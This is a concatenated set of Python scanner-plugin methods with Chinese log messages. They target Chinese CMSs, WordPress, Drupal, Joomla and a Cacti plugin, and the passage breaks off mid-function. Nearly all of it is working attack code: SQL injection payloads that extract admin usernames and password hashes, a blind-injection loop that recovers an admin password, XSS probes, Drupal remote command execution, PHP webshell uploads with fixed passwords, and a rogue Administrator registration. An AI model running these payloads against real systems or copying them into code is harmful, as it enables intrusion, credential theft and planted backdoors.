def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先登录用户。获取cookies
s = requests.session()
cookies = {}
raw_cookies = self.get_option('cookies')
for line in raw_cookies.split(';'):
key, value = line.split('=', 1) # 1代表只分一次,得到两个数据
cookies[key] = value
# 验证漏洞
payload = '/upload/houtai/admin_collect.php?action=addrule'
url = self.target + payload
headers = {
'Referer': '%s&id=3' % (payload),
'Content-Type': 'application/x-www-form-urlencoded'
}
data = "step=2&id=3&itemname=11&intodatabase=0&getherday=0&siteurl=aaa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E \
&coding=gb2312&playfrom=&downfrom=&autocls=0&classid=0&inithit=0&pageset=0&pageurl0=&pageurl1=&istart=1&iend=1 \
&pageurl2=&Submit=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF%E5%B9%B6%E8%BF%9B%E5%85%A5%E4%B8%8B%E4%B8%80%E6%AD%A5%E8%AE%BE%E7%BD%AE"
self.output.info('正在尝试XSS请求')
r = s.post(url, headers=headers, cookies=cookies, data=data)
if '<script>alert(1)</script>' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 需要注册登录获取cookies
# 注册后直接访问登录状态界面,获取到cookies
s = requests.session()
s.get(self.target)
payload = '/e/member/state.aspx?table=pa_member&detailid=2&workid=1&s=1'
true_data = "post=update¤t_title=111¤t_username=aaaa2222&sendmail=1&author=' or (select top 1 asc(mid(UserName+UserPassword,1,1)) from pa_member)=97 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and ''='"
false_data = "post=update¤t_title=111¤t_username=aaaa2222&sendmail=1&author=' or (select top 1 asc(mid(UserName+UserPassword,1,1)) from pa_member)=97 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and ''='"
url = self.target + payload
start_time = time.time()
r = s.post(url, data=true_data)
end_time_true = time.time()
r = s.post(url, data=false_data)
end_time_false = time.time()
if (end_time_true - start_time) - (end_time_false -
end_time_true) > 10:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 登录后台用户
# 获取cookies
s = requests.session()
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
payload = '/xdan_Admin/SEMCMS_Banner.php'
url = self.target + payload
s.get(url, cookies=cookies)
verify_url = url + \
"?lgid=1%20and%201=1%20union%20select%201,2,concat(user(),0xa3a,md5(c)),4,5,6,7#"
r = s.get(verify_url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 登录后台用户
s = requests.session()
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
s.get(self.target + '/admin/admin_feedback.php', cookies=cookies)
payload = '/admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,md5(c),9,10%23'
url = self.target + payload
r = s.get(url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞\n具体请查看漏洞详情'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先获取token。访问域名 + /dede/tpl.php?action=upload
s = requests.session()
r = s.get(self.target+'/dede/tpl.php?action=upload')
# 获取token
p = re.compile(
r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
if p.findall(r.text):
token = p.findall(r.text)[0]
s.get(
self.target + '/dede/tpl.php?filename=cscan.lib.php&action=savetagfile&content=%3C?php%20phpinfo();eval($_POST[c]);?%3E&token={token}'.format(token=token))
verify_url = self.target + '/include/taglib/cscan.lib.php'
r = requests.get(verify_url)
if 'PHP Version' in r.text and 'System' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
target=self.target, name=self.vuln.name, url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
s.get(self.target)
payload = "/index.php?m=poster&c=index&a=poster_click&id=1"
url = self.target + payload
headers = {
'Referer':
"http://{target}’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,md5(c),0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#"
.format(target=self.target)
}
r = s.get(url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target, name=self.vuln.name, url=url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先注册用户登录。
s = requests.session()
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
s.get(self.target, cookies=cookies)
payload_normal = "/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc,if(1=1,1,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2"
payload_abnormal = "/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc,if(1=2,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2"
url_normal = self.target + payload_normal
url_abnormal = self.target + payload_abnormal
r_normal = s.get(url_normal)
r_abnormal = s.get(url_abnormal)
if r_normal.text != r_abnormal.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 登录用户
s = requests.session()
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
s.get(self.target + '/web/index.php', cookies=cookies)
payload = "/web/index.php?c=platform&a=qr&do=delsata&id[0]=1\&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/md5(c))))--+"
url = self.target + payload
r = s.get(url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
# 根据传入命令的不同,输出数据也会不同,所以后期再根据系统定制化参数的功能对payload做通用性处理
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
payload = {
'form_id':
'user_register_form',
'_drupal_ajax':
'1',
'mail[#post_render][]':
'exec',
'mail[#type]':
'markup',
'mail[#markup]':
'echo "c4ca4238a0b923820dcc509a6f75849b" | tee hello.txt'
}
res = s.post(
self.target +
'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
data=payload)
r = s.get(self.target + '/hello.txt')
# print(r.text)
if 'c4ca4238a0b923820dcc509a6f75849b' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先登录用户。获取cookies
s = requests.session()
cookies = {}
raw_cookies = self.get_option('cookies')
for line in raw_cookies.split(';'):
key, value = line.split('=', 1) # 1代表只分一次,得到两个数据
cookies[key] = value
# 验证漏洞
payload = '/admin/admin_ping.php?action=set'
url = self.target + payload
data = {"token": "123456789\";$var=phpinfo().\""}
self.output.info('正在尝试上传可执行代码 phpinfo() 到/data/admin/ping.php中')
s.post(url, data=data, cookies=cookies)
verify_url = self.target + '/data/admin/ping.php'
r = s.get(verify_url)
if 'PHPVersion' in r.text and 'System' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,已上传可执行代码 phpinfo() 到/data/admin/ping.php中'
.format(target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def check_my_shell(self, shell_url):
# md5(666) = fae0b27c451c728867a567e8c1bb4e53
s = requests.session()
res = s.get(shell_url)
if "fae0b27c451c728867a567e8c1bb4e53" in res.text:
return True
else:
return False
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
_Host = self.target
try:
_Req = requests.session().get(_Host)
_WebContent = str(_Req.headers)
_WebTmp = _WebContent.split('; path=/')
_WebTmp = _WebTmp[0]
_WebTmp = _WebTmp.split('\'')
_WebTmp = _WebTmp[len(_WebTmp) - 1]
_WebTmp = _WebTmp.split('=')
_SessionID = _WebTmp[0]
_Session = _WebTmp[1]
except:
#args['success'] = False
return None
for i in range(4000):
_Session += random.choice(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i',
'o', 'p', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'z', 'x', 'c', 'v', 'b', 'n', 'm'])
_Cookies = {
_SessionID: _Session
}
HEADER = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0'
}
_Count = 0
for i in range(10):
_req = requests.get(_Host, cookies=_Cookies, headers=HEADER)
_TmpContent = _req.text
if len(_TmpContent) > _Count:
_Count = len(_TmpContent)
#args['success'] = False
else:
#args['success'] = True
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
break
return None
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
# get cookie
r = s.get(self.target +
'/index.php/component/users/?task=registration.register')
# 获取token
p = re.compile(
r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
if p.findall(r.text):
token = p.findall(r.text)[0]
# 生成随机注册信息
randstr = '_' + str(random.randint(1, 10000))
info = 'admin' + randstr
data = {
# User object
'task': (None, 'user.register'),
'option': (None, 'com_users'),
'user[name]': (None, 'admin' + randstr),
'user[username]': (None, 'admin' + randstr),
'user[password1]': (None, 'admin' + randstr),
'user[password2]': (None, 'admin' + randstr),
'user[email1]': (None, 'admin' + randstr + '@xx.com'),
'user[email2]': (None, 'admin' + randstr + '@xx.com'),
'user[groups][]': (None, '7'), # Administrator!
token: (None, '1')
}
r = s.post(
self.target +
'/index.php/component/users/?task=registration.register',
files=data,
allow_redirects=False)
if 'index.php?option=com_users&view=registration' in r.headers[
'location']:
self.output.report(
self.vuln,
'发现{target}存在{vulnname}漏洞,已注册用户名:{name},密码:{passwd}'.
format(target=self.target,
vulnname=self.vuln.name,
name=info,
passwd=info))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先注册用户。
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
s = requests.session()
s.get(self.target)
payload = '/user/adv2.php?action=modify'
cookies = {'UserName': '******'}
flag = ''
data_sleep = {
'id':
'0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=33,sleep(5),0)'
}
data_normal = {
'id':
'0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=33,md5(c),0)'
}
url = self.target + payload
time_start = time.time()
s.post(url, data=data_normal)
time_end_normal = time.time()
s.post(url, data=data_sleep)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 4:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
# 登录后台用户
s = requests.session()
payload = '/chanzhi/admin.php?m=package&f=upload'
url = self.target + payload
s.get(url, cookies=cookies)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryGgFOYWAluy1F8lvn",
"Accept-Language": "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
}
data = """
------WebKitFormBoundaryGgFOYWAluy1F8lvn
Content-Disposition: form-data; name="file"; filename="php.php"
Content-Type: text/php
<?php echo md5(c);@eval($_GET['c']);>
------WebKitFormBoundaryGgFOYWAluy1F8lvn--
"""
s.post(url, headers=headers, data=data)
verify_url = self.target + '/chanzhi/system/tmp/package/php.php'
r = s.get(verify_url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
target=self.target, name=self.vuln.name, url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先登录用户。获取cookies
s = requests.session()
cookies = {}
raw_cookies = self.get_option('cookies')
for line in raw_cookies.split(';'):
key, value = line.split('=', 1) # 1代表只分一次,得到两个数据
cookies[key] = value
# 验证漏洞
payload = '/upload/reg.php?action=reg'
url = self.target + payload
s.get(url, cookies=cookies)
headers_sleep = {
'X-Forwarded-For':
"1.1.1.1' or updatexml(1,concat(0x7e,(sleep(5))),0) or '"
}
headers_normal = {
'X-Forwarded-For':
"1.1.1.1' or updatexml(1,concat(0x7e,(version())),0) or '"
}
data = "m_user=aaaaaa&m_pwd=123456&m_pwd2=123456&email=1111aaaaaas%40qq.coam"
time_start = time.time()
s.post(url, data=data, headers=headers_normal)
time_end_normal = time.time()
s.post(url, data=data, headers=headers_sleep)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 4:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先注册用户。
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
s = requests.session()
s.get(self.target)
payload = '/user/adv2.php?action=modify'
url = self.target + payload
cookies = {'UserName': '******'}
flag = ''
for i in range(1, 40):
for j in range(33, 125):
data = {
'id':
'0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'
.format(i, j)
}
# print data
r = s.post(url, data=data, cookies=cookies)
# print r.text
sec = r.elapsed.seconds
# print i,j,sec
if sec > 2:
flag += chr(j)
print(flag)
break
print(flag)
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
url = self.target + "/index.php"
r = s.get(url)
header = {
"X-Forwarded-For": "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
}
r = s.get(url, headers=header)
if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞;\n具体请查看漏洞详情'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 前台用户登入后
s = requests.session()
s.get(self.target)
payload = "/admin.php?ac=duty&fileurl=duty&menuid=31&number=123%20and%20(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(username,md5(c))%20FROM%20toa_user%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)"
url = self.target + payload
r = s.get(url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 漏洞需要会员登录
s = requests.session()
payload = '/dede/member/buy_action.php'
data = """product=1141056911' and char(@') and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(0xC3DCC2EB,userid,0x3a,md5(c))) from #@__admin limit 0,1),1,62)))a from information_schema.tables group by a)b))#"""
url = self.target + payload
s.get(url)
r = s.post(url, data=data)
if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
payload = '/virtual-office/offer.php'
data = {
'data[trade][price FROM pb_thk_trades where 1=1 and (select 1 from (select count(*),concat(md5(c),floor(rand(0)*2))x from information_schema.tables group by x)a)#]': (None, '0.00')
}
url = self.target + payload
r = s.post(url, files=data, allow_redirects=False)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target, name=self.vuln.name, url=url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 登录任意一个用户
s = requests.session()
s.get(self.target)
payload = "/admin.php?ac=conference&fileurl=administrative&do=keys&id=123%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%28username,md5(c)%29%20FROM%20toa_user%20LIMIT%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
url = self.target + payload
r = s.get(url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 注册用户
s = requests.session()
s.get(self.target)
payload = '/index.php?ac=news_all&yz=1%20union%20select%20group_concat%28username,0x23,md5%28c%29%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20tc_user%23'
url = self.target + payload
r = requests.get(url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 注册企业用户,登陆后验证
s = requests.session()
s.get(self.target)
o = urllib.parse.urlparse(self.target)
payload = "/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>"
url = self.target + payload
r = s.get(url)
if r.status_code == 200 and 'system' in r.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target, name=self.vuln.name, url=url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target
shell_text = "Gif89a <?php @eval($_POST['wooyun']);?>"
file = None
try:
if not (file is None):
shellfile = open(file, 'rb')
shell_text = shellfile.read()
shellfile.close()
except Exception as e:
self.output.info("File Not Found.")
return
temp_url = "{target_url}/plugins/weathermap/editor.php?plug=0&mapname={shell_name}&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo md5(666);?>{shell_content}&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=NameH"
timetemp = time.time()
tmp_file_name = str(int(timetemp)) + ".php"
s = requests.session()
res = s.get(
temp_url.format(target_url=url,
shell_name=tmp_file_name,
shell_content=shell_text))
if res.status_code == 200:
check_shell = url + \
"/plugins/weathermap/configs/{shell_name}".format(
shell_name=tmp_file_name)
flag = self.check_my_shell(check_shell)
if flag:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
print(("SHELL: " + check_shell))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 漏洞需要会员登录
s = requests.session()
payload = '/dede/member/pm.php'
data = "?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(md5(c),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
url = self.target + payload
s.get(url)
r = s.post(url, data=data)
if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
payload = '/wp-admin/admin.php?where1=<script>alert(/xss/)</script>&searchsubmit=Buscar&page=nsp_search'
verify_url = self.target + payload
#code, head, res, errcode, _ = curl.curl(url)
r = s.get(self.target + '/wp-admin/admin.php')
r = s.get(verify_url)
if r.status_code == 200 and '<script>alert(/cscan/)</script>' in r.text:
# security_hole(url)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 漏洞需要会员登录
s = requests.session()
payload = '/dedecmsnew/member/album_add.php'
data = """mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(md5(c),0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'','','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'"""
url = self.target + payload
s.get(url)
r = s.post(url, data=data)
if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 注册用户aaaaaa后,http://localhost/user-edit.html修改资料
s = requests.session()
s.get(self.target)
payload = '/user-edit.html'
#data = "realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=super"
data = "realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=md5%28c%29"
url = self.target + payload
r = requests.post(url, data=data)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
target=self.target, name=self.vuln.name, url=url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
s = requests.session()
headers = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101Firefox/45.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': '{target}/login.htm'.format(target=self.target),
'Cookie': 'SessionID=',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '84'
}
